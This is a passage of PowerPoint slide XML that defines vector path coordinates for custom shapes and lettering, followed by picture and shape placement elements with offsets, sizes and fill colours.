                    <a:pt x="224558" y="110540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227098" y="107126"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228265" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187514" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184570" y="103956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184348" y="103956"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176399" y="102148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173148" y="101193"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170486" y="100136"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="86603"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="209744" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="90586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209481" y="92841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194565" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="228265" y="104322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230735" y="98389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231570" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="86603"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="195053" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="187290" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183308" y="25196"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160529" y="53014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160529" y="58622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="160943" y="65673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161013" y="66868"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="180808" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194260" y="93471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="197816" y="92841"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204217" y="90322"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207123" y="88635"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209596" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="86603"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192777" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189140" y="75427"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184263" y="70245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183044" y="65673"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183106" y="53014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184466" y="48605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190181" y="42062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191487" y="41533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194504" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209622" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="207164" y="27777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="204420" y="26578"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198406" y="24830"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195053" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="40375"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="201697" y="40375"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="203323" y="40517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206960" y="41127"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208484" y="41533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="42062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209744" y="72948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208017" y="74086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="206087" y="75000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201901" y="76382"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="199747" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="76707"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="40375"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="231649" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="210415" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209622" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="29321"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="231649" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="276801" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="254896" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254896" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276801" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276801" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="277410" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="254286" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="254286" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277410" y="16581"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277410" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="321830" y="41086"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="299925" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299925" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="301998" y="87172"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310288" y="94060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316608" y="95767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328922" y="95767"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="332133" y="95605"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337395" y="94914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339875" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="93837"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="329369" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="327296" y="80548"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324466" y="78902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323436" y="77764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322867" y="76341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322257" y="74919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321932" y="73334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="41086"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="342232" y="78902"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="340403" y="78902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339692" y="79308"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338411" y="79755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334734" y="80731"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333250" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="80974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="78902"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="342232" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="290944" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290944" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342232" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="321830" y="6807"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="299925" y="6807"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299925" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321830" y="6807"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="424102" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="400672" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="400672" y="61792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="423423" y="94088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="440845" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450164" y="95759"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477150" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="434932" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="430833" y="77601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="429798" y="76529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425402" y="71404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424169" y="66974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="424102" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="481079" y="4084"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="457650" y="4084"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="457650" y="66974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456395" y="71404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="456309" y="71708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="450924" y="77601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="446677" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477150" y="79085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478523" y="76529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="480433" y="69645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481074" y="61792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="481079" y="4084"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="502131" y="72887"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="500140" y="72887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500140" y="90850"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503127" y="92232"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="507089" y="93491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="516965" y="95747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522472" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528547" y="96316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562879" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525682" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522614" y="81421"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503228" y="73659"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="502131" y="72887"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="540313" y="24404"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="535212" y="24404"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525683" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="527008" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="520775" y="26034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="514822" y="28082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="509751" y="30926"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="503553" y="35275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500444" y="40721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="500494" y="52526"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="529035" y="69595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531229" y="69981"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="532855" y="70347"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536249" y="71038"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="538545" y="71749"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540983" y="73253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541593" y="74492"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="541593" y="77967"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540556" y="79369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536431" y="81279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="533241" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562879" y="81747"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563811" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="563925" y="68010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="562543" y="64007"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536736" y="51693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="534338" y="51246"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528080" y="49946"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525499" y="49113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523325" y="47406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522776" y="46166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522776" y="42773"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523975" y="41391"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="528791" y="39461"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="531758" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="29260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558194" y="28082"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="554537" y="26984"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="545189" y="24912"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="540313" y="24404"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="560816" y="38973"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="539520" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="543726" y="39664"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="552017" y="42468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="555715" y="44277"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="558946" y="46491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="46491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="560816" y="38973"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="614359" y="24160"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="578217" y="45641"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="575629" y="60756"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="576311" y="68799"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600103" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600314" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608338" y="95679"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="617997" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623300" y="96255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628116" y="95808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="636874" y="94040"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641527" y="92597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="90606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="613079" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="607572" y="79491"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="600074" y="73822"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="598042" y="69737"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597717" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647725" y="64393"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647725" y="56753"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647445" y="52763"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647362" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597656" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597965" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="597981" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="599505" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="602208" y="41086"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="604854" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="608385" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643290" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643019" y="37236"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639353" y="32572"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="634648" y="28892"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="628914" y="26263"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622541" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="623501" y="24777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614359" y="24160"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="646445" y="73070"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="644027" y="73070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="641527" y="74980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="638093" y="76748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629437" y="80080"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624966" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="80913"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="646445" y="73070"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="643290" y="37815"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="617123" y="37815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620455" y="38973"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="622609" y="41269"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="624743" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625800" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="625881" y="47020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626003" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647362" y="51592"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="647203" y="49323"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645819" y="43586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645746" y="43281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="645635" y="42819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="643290" y="37815"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="687532" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="665627" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665627" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="94446"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="48808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="690275" y="47833"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692856" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697611" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="26293"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="715025" y="46329"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="708099" y="46329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="710677" y="46532"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="712160" y="46776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="713212" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="47142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="46329"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="715645" h="120650">
                  <a:moveTo>
                    <a:pt x="715025" y="26293"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="705708" y="26293"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="703626" y="26720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="696514" y="29423"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="692348" y="32166"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687532" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="36291"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="715025" y="26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A6328BB0-6FCA-B5BF-9560-B26EAB2653E0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6754365" y="4045118"/>
              <a:ext cx="979805" cy="478155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="979804" h="478154">
                  <a:moveTo>
                    <a:pt x="639009" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="340228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340704" y="477832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979714" y="370471"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979714" y="128530"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639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223FE0FE-290E-8C3C-FC4D-217D1980AD80}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7096584" y="4172137"/>
              <a:ext cx="639445" cy="351155"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="639445" h="351154">
                  <a:moveTo>
                    <a:pt x="635981" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="102824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="350813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="99939" y="332667"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319504" y="294864"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="537555" y="257061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610239" y="244964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="629924" y="243452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="639009" y="243452"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="635981" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="E8EBE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4" name="object 40">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39380676-4325-C458-D343-21A734A9D2F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54365" y="4046630"/>
              <a:ext cx="970628" cy="476320"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="45" name="object 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A73749-EE32-DE3E-7A62-881F729DB7DF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46037" y="3514946"/>
              <a:ext cx="1400663" cy="1160244"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="46" name="object 42">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{677110DE-B9EC-3113-55BC-5F014817D0A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45039" y="3648941"/>
              <a:ext cx="443672" cy="491441"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="47" name="object 43">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1937951E-FC26-B006-65D5-95A132A32E73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06943" y="4203892"/>
